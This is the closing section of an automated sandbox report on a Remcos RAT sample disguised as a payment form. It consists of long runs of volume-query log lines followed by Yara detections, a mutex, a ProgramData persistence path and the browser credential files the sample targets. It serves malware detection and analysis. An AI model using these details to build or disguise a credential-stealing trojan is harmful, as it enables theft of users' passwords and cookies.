              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeQueries volume information: C:\Users\user\AppData\Roaming\iKgKaogJ.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\iKgKaogJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\ProgramData\AppUpdate\remcos.exeQueries volume information: C:\ProgramData\AppUpdate\remcos.exe VolumeInformation
              Source: C:\ProgramData\AppUpdate\remcos.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\ProgramData\AppUpdate\remcos.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\ProgramData\AppUpdate\remcos.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\ProgramData\AppUpdate\remcos.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\ProgramData\AppUpdate\remcos.exeQueries volume information: C:\ProgramData\AppUpdate\remcos.exe VolumeInformation
              Source: C:\ProgramData\AppUpdate\remcos.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\ProgramData\AppUpdate\remcos.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\ProgramData\AppUpdate\remcos.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\ProgramData\AppUpdate\remcos.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\ProgramData\AppUpdate\remcos.exeQueries volume information: C:\ProgramData\AppUpdate\remcos.exe VolumeInformation
              Source: C:\ProgramData\AppUpdate\remcos.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\ProgramData\AppUpdate\remcos.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\ProgramData\AppUpdate\remcos.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\ProgramData\AppUpdate\remcos.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\ProgramData\AppUpdate\remcos.exeQueries volume information: C:\ProgramData\AppUpdate\remcos.exe VolumeInformation
              Source: C:\ProgramData\AppUpdate\remcos.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\ProgramData\AppUpdate\remcos.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\ProgramData\AppUpdate\remcos.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\ProgramData\AppUpdate\remcos.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_0040A0B0 GetLocalTime,wsprintfW,9_2_0040A0B0
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_004195F8 GetUserNameW,9_2_004195F8
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: 9_2_004466BF _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,9_2_004466BF
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 9.2.Payment Transfer Request Form.bat.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Payment Transfer Request Form.bat.exe.42d99c0.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.Payment Transfer Request Form.bat.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Payment Transfer Request Form.bat.exe.434efe0.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Payment Transfer Request Form.bat.exe.434efe0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Payment Transfer Request Form.bat.exe.42d99c0.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000024.00000002.1736773927.0000000000BEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000020.00000002.1656887776.0000000000D4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000002.3782308386.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.1407344012.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.1574639451.000000000117A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1417981546.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Payment Transfer Request Form.bat.exe PID: 4072, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Payment Transfer Request Form.bat.exe PID: 7380, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 8156, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 2508, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 3248, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 7388, type: MEMORYSTR
              Contains functionality to steal Chrome passwords or cookies
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data9_2_0040A953
              Contains functionality to steal Firefox passwords or cookies
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\9_2_0040AA71
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeCode function: \key3.db9_2_0040AA71

              Remote Access Functionality

              barindex
              Detected Remcos RAT
              Source: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-VCJ8ZSJump to behavior
              Source: C:\ProgramData\AppUpdate\remcos.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-VCJ8ZS
              Source: C:\ProgramData\AppUpdate\remcos.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-VCJ8ZS
              Source: C:\ProgramData\AppUpdate\remcos.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-VCJ8ZS
              Source: C:\ProgramData\AppUpdate\remcos.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-VCJ8ZS
              Yara detected Remcos RAT
              Source: Yara matchFile source: 9.2.Payment Transfer Request Form.bat.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Payment Transfer Request Form.bat.exe.42d99c0.2.unpack, type: UNPACKEDPE
